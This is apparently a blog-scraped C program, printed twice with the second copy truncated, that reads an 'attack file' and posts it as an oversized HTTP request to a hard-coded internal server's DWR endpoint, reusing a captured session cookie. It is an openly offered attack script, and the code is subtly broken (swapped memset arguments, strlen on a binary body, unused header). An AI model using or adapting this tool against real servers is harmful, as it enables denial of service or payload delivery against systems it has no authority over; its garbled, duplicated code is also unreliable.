#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define BODY_LEN 10 * 1024 * 1024
int main(int argc, char *argv[])
{
int sockfd = 0;
int result = 0;
FILE *fp = NULL;
char *pBody = NULL;
struct sockaddr_in servAddr;
char *pHeader = "POST http://10.249.198.113/dwr/dwr/call/plaincall/Multiple.2.dwr HTTP/1.1\r\n"
"Host: 10.249.198.113\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 Paros/3.2.13\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: zh-cn,zh;q=0.5\r\n"
"Proxy-Connection: keep-alive\r\n"
"Content-Type: text/plain; charset=UTF-8\r\n"
"Referer: http://10.249.198.113/dwr/people/edit.html\r\n"
"Cookie: DWRSESSIONID=SLbtK6YIn5hLB1$IJi63BcrPUqj\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Length: 1205376\r\n"
"\r\n";
char *pHeaderTmp = "POST /index.jsp HTTP/1.0\r\n"
"User-Agent: Wget/1.12 (linux-gnu)\r\n"
"Accept: */*\r\n"
"Host: 10.249.198.113\r\n"
"Connection: Keep-Alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 3000\r\n"
"\r\n";
if (1 == argc)
{
printf("tell me where's the attack file pls...\r\n");
return 0;
}
fp = fopen(argv[1], "r");
if (NULL == fp)
{
printf("open file error...\r\n");
return 0;
}
pBody = malloc(BODY_LEN);
if (NULL == pBody)
{
printf("malloc error...\r\n");
return 0;
}
memset(pBody, BODY_LEN, 0);
result = fread(pBody, 1, BODY_LEN, fp);
printf("file size: %d\r\n", result);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (-1 == sockfd)
{
printf("socket error...\r\n");
return 0;
}
memset(&servAddr, sizeof(servAddr), 0);
servAddr.sin_family = AF_INET;
servAddr.sin_port = htons(80);
servAddr.sin_addr.s_addr = inet_addr("10.249.198.113");
result = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(struct sockaddr));
if (-1 == result)
{
printf("connect error...\r\n");
return 0;
}
#if 1
result = send(sockfd, pHeader, strlen(pHeader), 0);
if (-1 == result)
{
printf("send header error...\r\n");
return 0;
}
#endif
result = send(sockfd, pBody, strlen(pBody), 0);
if (-1 == result)
{
printf("send body error...\r\n");
return 0;
}
printf("done...\r\n");
free(pBody);
fclose(fp);
close(sockfd);
return 1;
}
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define BODY_LEN 10 * 1024 * 1024
int main(int argc, char *argv[])
{
int sockfd = 0;
int result = 0;
FILE *fp = NULL;
char *pBody = NULL;
struct sockaddr_in servAddr;
char *pHeader = "POST http://10.249.198.113/dwr/dwr/call/plaincall/Multiple.2.dwr HTTP/1.1\r\n"
"Host: 10.249.198.113\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 Paros/3.2.13\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: zh-cn,zh;q=0.5\r\n"
"Proxy-Connection: keep-alive\r\n"
"Content-Type: text/plain; charset=UTF-8\r\n"
"Referer: http://10.249.198.113/dwr/people/edit.html\r\n"
"Cookie: DWRSESSIONID=SLbtK6YIn5hLB1$IJi63BcrPUqj\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Length: 1205376\r\n"
"\r\n";
char *pHeaderTmp = "POST /index.jsp HTTP/1.0\r\n"
"User-Agent: Wget/1.12 (linux-gnu)\r\n"
"Accept: */*\r\n"
"Host: 10.249.198.113\r\n"
"Connection: Keep-Alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 3000\r\n"
"\r\n";
if (1 == argc)
{
printf("tell me where's the attack file pls...\r\n");
return 0;
}
fp = fopen(argv[1], "r");
if (NULL == fp)
{
printf("open file error...\r\n");
return 0;
}
pBody = malloc(BODY_LEN);
if (NULL == pBody)
{
printf("malloc error...\r\n");
return 0;
}
memset(pBody, BODY_LEN, 0);
result = fread(pBody, 1, BODY_LEN, fp);
printf("file size: %d\r\n", result);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (-1 == sockfd)
{
printf("socket error...\r\n");
return 0;
}
memset(&servAddr, sizeof(servAddr), 0);
servAddr.sin_family = AF_INET;
servAddr.sin_port = htons(80);
servAddr.sin_addr.s_addr = inet_addr("10.249.198.113");
result = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(struct sockaddr));
if (-1 == result)
{
printf("connect error...\r\n");
return 0;
}
#if 1
result = send(sockfd, pHeader, strlen(pHeader), 0);
if (-1 == result)
{
printf("send header error...\r\n");
return 0;
}
#endif
result = send(sockfd, pBody, strlen(pBody), 0);
if (-1 == result)
{
printf("send body error...\r\n");
return 0;
}
printf("done...\r\n");
free(pBody);
fclose(fp);
close(sockfd);
return 1;
}
扫一扫
3754
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
